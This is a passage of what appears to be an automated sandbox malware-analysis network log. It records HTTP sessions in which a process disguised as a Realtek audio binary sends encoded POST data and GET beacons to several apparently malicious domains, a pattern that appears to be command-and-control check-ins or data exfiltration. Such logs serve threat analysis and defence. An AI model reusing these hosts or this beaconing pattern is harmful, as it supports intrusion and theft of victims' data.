34 66 4e 79 57 56 62 63 70 69 2f 49 64 4f 4c 2f 43 54 39 77 75 39 30 37 2f 47 38 71 75 49 63 52 64 35 54 48 51 67 58 [TRUNCATED] Data Ascii: cOnShP=ac270/Kc6bxJz/oUwNOIabyewQf4levxjp+EpEI0TKRkeF7RKSyXSotxT0MM99zeNWBg2J4MUY3Jc82cVLYo9VBTazXYUZnlI8IMNBnqFgHP9KrNICu1tX4XxE0qnUNf1lJWFMswuYN+qc4BFSzS7taT6oULhNfdIxzrsLQDbgf2SEKZ/mK7UTF/4uy2EUNmWFiNd8EXCUii2NdKrNQsf8kHsnkmR8jvYhOX0U1TxhdLGj3fOzLz8w964En7NH0E7osrwhFS5NcfdEGuBHcoPRiBmRRNRmwk4fMd4fNyWVbcpi/IdOL/CT9wu907/G8quIcRd5THQgXkfWe/BKw/4DrnNVAFQjPBMg/BxlF/1tBjhCATDrFVhHlGUvzX2Hh/TK0lO29ZQnYpasNSklT48O7mO+ALnzgrrubAguw30yUgsnEPVcLPAEscIkXOyYEQZXiSwd3hUEOZ6tcXsXn0gKyw5D58LyjNxvqMtUD8rCNkAk6DNYr5nfi2h7Iy6A6baKanBxmAml6cljW5R0mpdma+pNbIXgk9+5JXqUeG4nc9cewTpxf+p+07ocQC6VY+zrqeP/ZklU5pJliXegmvpoo3wzlbJ18QDldaQujDlzY0lLDzcQeRYBcJ1g1tTZUIPxt7XUhDhatp8RgQpmNGhTebF98duJbujpnih1X
Jan 9, 2025 08:32:38.688452005 CET	1289	OUT	Data Raw: 32 2b 46 68 62 44 4d 59 44 4c 76 49 41 64 44 4b 62 74 7a 4e 45 79 71 4e 45 59 6c 47 4f 66 4e 32 4d 51 79 4a 76 54 71 56 58 6b 33 71 37 65 33 71 46 44 69 6d 30 46 34 75 71 61 76 4a 66 36 45 76 68 41 48 30 51 6d 69 70 62 39 4e 2b 63 72 4d 44 47 75 Data Ascii: 2+FhbDMYDLvIAdDKbtzNEyqNEYlGOfN2MQyJvTqVXk3q7e3qFDim0F4uqavJf6EvhAH0Qmipb9N+crMDGuMewOWpjVmNaxExDRO+6uZvCFx54vcymK7+WbbuEM8icpoM9DTrwpUbLiX+GMVbQao/w6IMQIHvyM3Zhe9AOexoTDdSioXIhra4KwyGkMSTPFS1PPpxMfFp1k/0s9QsThh4wkQuHZQUQjE9ADtNGQSIEmyKYkZ6d+f
Jan 9, 2025 08:32:38.688512087 CET	5396	OUT	Data Raw: 41 65 68 6d 51 56 49 36 41 75 5a 56 52 4e 47 64 64 38 4c 6b 42 74 43 30 72 48 61 47 4c 4c 6d 43 64 61 47 77 41 67 33 4c 72 71 39 44 2f 54 6b 63 65 4e 73 72 4a 65 69 33 6f 61 75 45 4d 50 4d 47 68 2b 58 51 35 76 47 42 50 4a 6d 52 56 78 34 38 38 41 Data Ascii: AehmQVI6AuZVRNGdd8LkBtC0rHaGLLmCdaGwAg3Lrq9D/TkceNsrJei3oauEMPMGh+XQ5vGBPJmRVx488AFoLFPK8ymwOr2oj//va3lBllwvc9wCON4Pfprl9Rb9ojgVL39F9n9LtOt1clMH5tXjjJ+Y+S2SnQUMSIG567ikMP+8N8sv6cTVBujqW06crNrDabm7u+BMCA+YjGE6MY8NVA6m9jUzsPOdZIVi99SJf7A7qdSEQvZ
Jan 9, 2025 08:32:39.045723915 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Thu, 09 Jan 2025 07:32:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.11.20	49749	202.95.11.110	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:41.528565884 CET	542	OUT	GET /wbfy/?cOnShP=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.mirenzhibo.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:32:42.060551882 CET	995	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 09 Jan 2025 07:32:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 33 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 42 61 69 64 75 73 70 69 64 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 [TRUNCATED] Data Ascii: 322<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="Baiduspider" content="noindex, nofollow"><title></title> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><body style="padding: 0;margin: 0;"><div><script rel="nofollow" src="http://www.zbywl.com/js.js"></script></div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.11.20	49750	76.223.54.146	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:47.401148081 CET	814	OUT	POST /kgjj/ HTTP/1.1 Host: www.nextlevel.finance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.nextlevel.finance Referer: http://www.nextlevel.finance/kgjj/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 62 54 69 68 36 50 48 78 38 5a 66 73 51 56 64 68 6b 78 72 2f 70 34 31 73 64 6b 6e 59 37 42 78 2b 56 44 2f 51 37 64 62 76 39 39 72 30 6e 6e 33 5a 57 52 2f 51 59 48 47 64 66 71 69 38 2f 36 38 4c 74 33 38 30 35 7a 6d 48 39 77 70 66 68 59 32 7a 4f 6e 6d 59 77 2f 61 6a 66 4c 50 63 6f 2f 6e 41 38 4e 31 78 6f 4d 41 43 6a 79 5a 56 7a 50 46 75 4f 64 47 6e 6d 4f 77 2f 45 6a 6d 69 53 35 57 39 30 36 33 67 4d 31 36 41 68 4f 38 70 4d 30 2b 37 44 72 6f 48 41 7a 55 43 78 5a 51 68 76 4a 78 47 6a 38 30 52 65 77 30 53 2f 33 6b 67 4e 76 52 58 39 30 37 33 32 67 3d 3d Data Ascii: cOnShP=r2nTWKLo591VbTih6PHx8ZfsQVdhkxr/p41sdknY7Bx+VD/Q7dbv99r0nn3ZWR/QYHGdfqi8/68Lt3805zmH9wpfhY2zOnmYw/ajfLPco/nA8N1xoMACjyZVzPFuOdGnmOw/EjmiS5W9063gM16AhO8pM0+7DroHAzUCxZQhvJxGj80Rew0S/3kgNvRX90732g==
Jan 9, 2025 08:32:47.538239956 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.11.20	49751	76.223.54.146	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:50.063817024 CET	834	OUT	POST /kgjj/ HTTP/1.1 Host: www.nextlevel.finance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.nextlevel.finance Referer: http://www.nextlevel.finance/kgjj/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 55 53 53 68 70 2b 48 78 70 70 66 76 56 56 64 68 74 52 71 34 70 34 70 73 64 6c 54 49 37 54 46 2b 57 6a 50 51 36 5a 33 76 38 39 72 30 7a 58 33 41 59 78 2f 48 59 48 4b 56 66 76 43 38 2f 38 51 4c 74 79 51 30 2b 41 2b 49 2b 41 70 64 70 34 32 31 44 48 6d 59 77 2f 61 6a 66 4c 62 6d 6f 2f 76 41 2f 2b 74 78 75 5a 38 42 74 53 5a 61 30 50 46 75 45 39 47 6a 6d 4f 77 42 45 6e 2f 31 53 37 75 39 30 34 76 67 4d 6b 36 44 36 2b 38 6e 52 6b 2b 6f 4d 4f 52 2f 65 41 73 47 78 72 63 42 76 37 56 54 69 71 35 4c 44 43 41 32 38 6b 34 53 4a 66 6f 2f 2f 32 36 73 72 68 51 41 5a 55 63 4b 6c 50 56 46 54 56 2b 32 30 66 71 41 68 61 30 3d Data Ascii: cOnShP=r2nTWKLo591VUSShp+HxppfvVVdhtRq4p4psdlTI7TF+WjPQ6Z3v89r0zX3AYx/HYHKVfvC8/8QLtyQ0+A+I+Apdp421DHmYw/ajfLbmo/vA/+txuZ8BtSZa0PFuE9GjmOwBEn/1S7u904vgMk6D6+8nRk+oMOR/eAsGxrcBv7VTiq5LDCA28k4SJfo//26srhQAZUcKlPVFTV+20fqAha0=
Jan 9, 2025 08:32:50.200700045 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.11.20	49752	76.223.54.146	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:52.740032911 CET	2578	OUT	POST /kgjj/ HTTP/1.1 Host: www.nextlevel.finance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.nextlevel.finance Referer: http://www.nextlevel.finance/kgjj/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 55 53 53 68 70 2b 48 78 70 70 66 76 56 56 64 68 74 52 71 34 70 34 70 73 64 6c 54 49 37 54 64 2b 57 51 33 51 36 34 33 76 36 4e 72 30 77 58 33 46 59 78 2f 2f 59 44 75 52 66 76 65 73 2f 2f 6b 4c 69 30 45 30 37 78 2b 49 6c 51 70 64 32 6f 32 77 4f 6e 6d 33 77 35 36 2f 66 4c 4c 6d 6f 2f 76 41 2f 34 42 78 34 38 41 42 76 53 5a 56 7a 50 46 79 4f 64 47 50 6d 4b 6b 33 45 6e 71 49 53 50 53 39 30 59 2f 67 4a 58 53 44 32 2b 39 42 43 55 2f 31 4d 4f 56 67 65 41 68 2f 78 71 6f 37 76 38 4a 54 67 64 67 4f 55 42 74 74 6c 55 6f 43 55 38 6b 35 72 58 43 46 6a 44 51 38 49 6e 49 6c 69 70 5a 58 64 47 61 71 70 4b 75 44 79 2f 46 47 77 7a 43 52 46 4b 30 39 42 6e 46 34 75 73 4a 4b 67 6c 4e 54 75 49 69 4b 54 58 70 33 45 44 79 31 49 73 46 34 63 77 6e 4b 53 70 53 77 2b 71 66 44 61 59 38 4f 7a 49 66 67 50 36 2f 6b 6f 51 63 58 56 4c 72 4c 50 44 6c 30 65 73 64 48 79 38 52 45 78 77 6e 37 6b 41 70 36 6a 33 39 48 76 37 55 44 47 36 4e 61 6c 63 5a 6c 4a 31 4a 77 69 44 74 7a 48 33 2b [TRUNCATED] Data Ascii: cOnShP=r2nTWKLo591VUSShp+HxppfvVVdhtRq4p4psdlTI7Td+WQ3Q643v6Nr0wX3FYx//YDuRfves//kLi0E07x+IlQpd2o2wOnm3w56/fLLmo/vA/4Bx48ABvSZVzPFyOdGPmKk3EnqISPS90Y/gJXSD2+9BCU/1MOVgeAh/xqo7v8JTgdgOUBttlUoCU8k5rXCFjDQ8InIlipZXdGaqpKuDy/FGwzCRFK09BnF4usJKglNTuIiKTXp3EDy1IsF4cwnKSpSw+qfDaY8OzIfgP6/koQcXVLrLPDl0esdHy8RExwn7kAp6j39Hv7UDG6NalcZlJ1JwiDtzH3+jTeh5zqsAUZmAQQfNT/YXnvXyc/VSMYgbkScgdoJzVT5h1tswylVf0rBm1zzs5BnQ6joVA8LQPSjX5oxjG+9XkuHrmDWcGIsnvI4geV0eclR+Mif9RFzV866nw/nK/hAwQD05iPK8TBwKFLA2Jdc3IoymcouxkztrL8z2CqrpEaLQwVVW3PsKtbISOmXEsbWxi7TGsdkuMiqKsXjAQJCpnphT3aywQ0gF9VMmfMyIXm11UG/VCggZSpvg4ErsL/e1jNou0b/r/Fzla3ORo5V8CW76xQUoJKCqQ++oEM8ud3DLTcLqiTsGkf5kiu6AKCLT1JO6G8QGd5tm7RHx/V7PjmoBBlGMhe8qDHE0yy0zY8dZH8ys8RfMXca7MAOSWzIbOs8b6Mq2RcIRImPl8Vp+pE+LvwPPPNkpM/0oI2CF66D4bAXFZZjS/kL1RkNHr8l7EuiScSkCjhWOwHBdVJy1n3MwGNWbmNNXxGVbnJvEZq3VD5Eg8Aa4mK3B8f7ZWBq8Qpus0XAds0zxFrrbHVmqvsvpFP+mQ2l/Jc3kHBxvIOsNF5vWTQV5dwaAVL7vCRvTXbz3AWsksySGyRlxTVRv639wJGqsQAfnFSRi/XwGdfoAFaaPVfr3gnwjwXqkdMr75D6elTx+HbgmeksOu846HubUcoCkV312U [TRUNCATED]
Jan 9, 2025 08:32:52.740096092 CET	5405	OUT	Data Raw: 69 6a 50 4d 36 4a 63 77 41 75 34 64 70 30 32 75 31 56 4c 4a 46 79 2b 37 48 69 54 47 64 68 37 76 4f 46 66 33 47 37 56 69 35 56 68 54 6b 64 67 46 35 39 42 37 4b 30 54 43 79 4b 71 73 45 42 57 68 53 68 77 35 57 56 48 33 4d 57 5a 50 53 57 73 55 38 50 Data Ascii: ijPM6JcwAu4dp02u1VLJFy+7HiTGdh7vOFf3G7Vi5VhTkdgF59B7K0TCyKqsEBWhShw5WVH3MWZPSWsU8PxgmkTxyhA6pTmoK3ADfYHB9hemsPRjqtg7pZIJtHQa2+GKh2vROXlLqd/ZQ8hjwbjWf72Iu1GTXfBqoQ7p1pzItAxu7u5EERYHHE2Xf02khSecW+b0yUzUhMMbx7QdkSnRQvmMOJdoJUcK2FTpk+XjlDdeT7GoeWz
Jan 9, 2025 08:32:52.876386881 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.11.20	49753	76.223.54.146	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:55.407700062 CET	545	OUT	GET /kgjj/?NvA=qUwPQPTQmTwyizTU&cOnShP=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0= HTTP/1.1 Host: www.nextlevel.finance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:32:55.548429966 CET	384	IN	HTTP/1.1 200 OK content-type: text/html date: Thu, 09 Jan 2025 07:32:55 GMT content-length: 263 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 76 41 3d 71 55 77 50 51 50 54 51 6d 54 77 79 69 7a 54 55 26 63 4f 6e 53 68 50 3d 6d 30 50 7a 56 2b 44 4c 39 4d 64 68 51 69 65 36 75 71 2f 61 6d 72 76 56 52 33 35 51 38 54 66 2f 6c 6f 74 59 55 58 2b 41 68 6a 4d 6f 51 41 37 46 33 4b 33 46 6a 50 76 38 6b 56 2f 51 42 77 2f 50 64 55 2f 4f 58 4d 2f 72 69 2f 49 62 72 46 59 47 34 78 79 70 69 41 42 77 6e 61 53 57 52 45 47 55 33 75 75 37 5a 59 58 6b 75 4d 4c 42 6e 74 42 41 6f 74 6b 73 6b 68 30 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NvA=qUwPQPTQmTwyizTU&cOnShP=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.11.20	49754	103.106.67.112	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:00.913116932 CET	799	OUT	POST /k29t/ HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.furrcali.xyz Referer: http://www.furrcali.xyz/k29t/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 31 75 48 2f 38 50 70 72 50 6b 36 49 7a 6c 42 37 32 78 71 35 53 7a 70 78 31 6b 42 31 4e 75 58 58 52 42 49 7a 78 64 52 31 38 77 6d 67 6a 57 45 48 75 36 4d 73 4f 5a 43 39 6c 41 34 5a 67 56 39 56 31 58 6f 36 52 54 36 54 54 2f 58 51 5a 43 4d 62 2b 2b 41 71 67 50 4e 59 30 75 76 41 41 6f 65 52 75 54 4c 63 50 54 2b 38 61 77 44 4f 63 52 78 59 69 6d 44 54 47 43 6d 77 4a 4e 79 52 53 6a 45 6b 36 78 4f 66 35 44 73 72 6e 6e 79 6a 75 59 4d 36 6f 36 7a 6e 38 78 33 43 4d 4d 30 33 58 34 39 61 59 69 78 4a 68 52 66 70 71 2f 6f 4e 75 4b 56 74 69 50 65 2f 51 3d 3d Data Ascii: cOnShP=rJkYOGdVVG3na1uH/8PprPk6IzlB72xq5Szpx1kB1NuXXRBIzxdR18wmgjWEHu6MsOZC9lA4ZgV9V1Xo6RT6TT/XQZCMb++AqgPNY0uvAAoeRuTLcPT+8awDOcRxYimDTGCmwJNyRSjEk6xOf5DsrnnyjuYM6o6zn8x3CMM03X49aYixJhRfpq/oNuKVtiPe/Q==
Jan 9, 2025 08:33:01.166862011 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/k29t/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Thu, 09 Jan 2025 07:33:01 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.11.20	49755	103.106.67.112	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:03.615832090 CET	819	OUT	POST /k29t/ HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.furrcali.xyz Referer: http://www.furrcali.xyz/k29t/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 52 53 48 7a 2f 58 70 75 76 6b 35 52 44 6c 42 79 57 78 75 35 53 2f 70 78 30 51 52 31 37 57 58 58 77 78 49 79 77 64 52 67 38 77 6d 30 7a 58 76 59 2b 36 44 73 4f 56 6b 39 6c 4d 34 5a 67 78 39 56 30 6e 6f 36 69 37 35 51 6a 2f 52 64 35 43 4f 52 65 2b 41 71 67 50 4e 59 30 36 46 41 41 41 65 53 64 37 4c 66 75 54 39 32 36 77 41 48 38 52 78 4b 53 6d 50 54 47 43 59 77 4e 46 63 52 51 72 45 6b 2b 31 4f 66 73 2f 72 77 33 6e 6f 74 4f 5a 6a 2f 70 71 35 6f 49 42 6b 53 64 73 2f 76 32 77 31 66 4f 76 72 55 54 6c 37 71 35 6a 61 4a 65 7a 39 76 67 4f 46 69 56 73 42 34 7a 62 38 57 7a 38 78 6f 36 58 78 63 6a 47 69 4b 5a 6b 3d Data Ascii: cOnShP=rJkYOGdVVG3naRSHz/Xpuvk5RDlByWxu5S/px0QR17WXXwxIywdRg8wm0zXvY+6DsOVk9lM4Zgx9V0no6i75Qj/Rd5CORe+AqgPNY06FAAAeSd7LfuT926wAH8RxKSmPTGCYwNFcRQrEk+1Ofs/rw3notOZj/pq5oIBkSds/v2w1fOvrUTl7q5jaJez9vgOFiVsB4zb8Wz8xo6XxcjGiKZk=
Jan 9, 2025 08:33:03.869601011 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/k29t/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Thu, 09 Jan 2025 07:33:03 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.11.20	49756	103.106.67.112	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:06.315614939 CET	2578	OUT	POST /k29t/ HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.furrcali.xyz Referer: http://www.furrcali.xyz/k29t/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 52 53 48 7a 2f 58 70 75 76 6b 35 52 44 6c 42 79 57 78 75 35 53 2f 70 78 30 51 52 31 37 65 58 57 47 46 49 79 58 4a 52 6d 4d 77 6d 33 7a 57 49 59 2b 36 61 73 4b 35 67 39 6c 52 4e 5a 69 35 39 55 57 76 6f 72 6a 37 35 48 54 2f 52 42 4a 43 4c 62 2b 2b 52 71 6b 54 42 59 30 71 46 41 41 41 65 53 62 48 4c 4a 50 54 39 77 36 77 44 4f 63 52 39 59 69 6d 72 54 47 61 58 77 4e 42 69 57 68 4c 45 6c 61 52 4f 64 65 58 72 74 6e 6e 75 75 4f 5a 37 2f 70 6e 6a 6f 4f 6c 43 53 65 78 6f 76 33 34 31 65 35 71 4e 4f 54 74 5a 75 36 62 36 4e 63 4c 2f 6e 44 6a 52 6d 32 70 34 33 43 62 46 57 6e 68 70 71 71 44 73 49 79 4b 33 64 73 36 4f 30 71 4c 4c 56 57 77 59 32 31 2f 75 6e 46 6c 68 48 75 36 31 61 4f 75 7a 76 59 39 42 77 51 72 78 67 30 59 74 7a 37 55 69 65 77 5a 50 53 63 47 52 44 76 6d 72 57 45 5a 48 78 50 41 52 68 33 58 65 74 53 43 53 53 5a 72 33 53 74 49 4d 56 4a 68 6b 54 31 47 66 36 7a 52 59 54 46 6e 4c 38 45 37 4c 4b 38 36 6f 77 58 67 74 54 44 45 51 4b 56 6b 4b 69 7a 77 [TRUNCATED] Data Ascii: cOnShP=rJkYOGdVVG3naRSHz/Xpuvk5RDlByWxu5S/px0QR17eXWGFIyXJRmMwm3zWIY+6asK5g9lRNZi59UWvorj75HT/RBJCLb++RqkTBY0qFAAAeSbHLJPT9w6wDOcR9YimrTGaXwNBiWhLElaROdeXrtnnuuOZ7/pnjoOlCSexov341e5qNOTtZu6b6NcL/nDjRm2p43CbFWnhpqqDsIyK3ds6O0qLLVWwY21/unFlhHu61aOuzvY9BwQrxg0Ytz7UiewZPScGRDvmrWEZHxPARh3XetSCSSZr3StIMVJhkT1Gf6zRYTFnL8E7LK86owXgtTDEQKVkKizwTq7NZbRHCUzrnu+BWtetApAfc91IfP5OGSp5I8uSfn6ky/495HTT6wNL1jLedJw7xtP8iMsRdpU14c2UNJpNQu9uqiApObEjz9Ga+t7JInw21qjAHj2LMDR8dU+DheFMQXR/muK9VvdKoaQ5dioH8JHAF5YiGYUSs+eZjiYT+ZpKcFOk3CD+JLvkSZzVSGgmGzoKLsiY3BPG5HJxaH8nAWoxzD8wt1FSi67uNhG02ehyCHO/R39natKTcdY/9A4SIAbUbg1u8qJE37tfMzBFiGa3Aw8gmeQgY9IALojq+WeQ0hJBOZOiiGWSJqzTSTQw6zTmNOEc6Elqd3fnj/LfWqPvJ0L7nMoWiN5u+z2pus4g66LD0JYyczlVOC64Lm4qoRuewE2etYlfqTuEKHpnOSPBGd6kDN5kMqNwufp2D0fhYWw04MF7V50QLPKD7wguPRftVLBspsIY+wZHBtZnobDPoWtIpCIR6CzPUd5mNmJlW7dE+Hop5SE+I+TXrQKy/S6jUjo2oVCEM1I86a9aO9IK4XhI/3vVSEuPCS/d2SMte6bOAwkmb9gDTevMVCtZsBwYS1pjVmKhKT/1INHCoij5xg/QZsPDif3dBVtblNWU7cGZN3IEfrDgbXioFhW5zGijcj9V4iifg3sk1OEVQWN9D+Jmq0s9Ef [TRUNCATED]
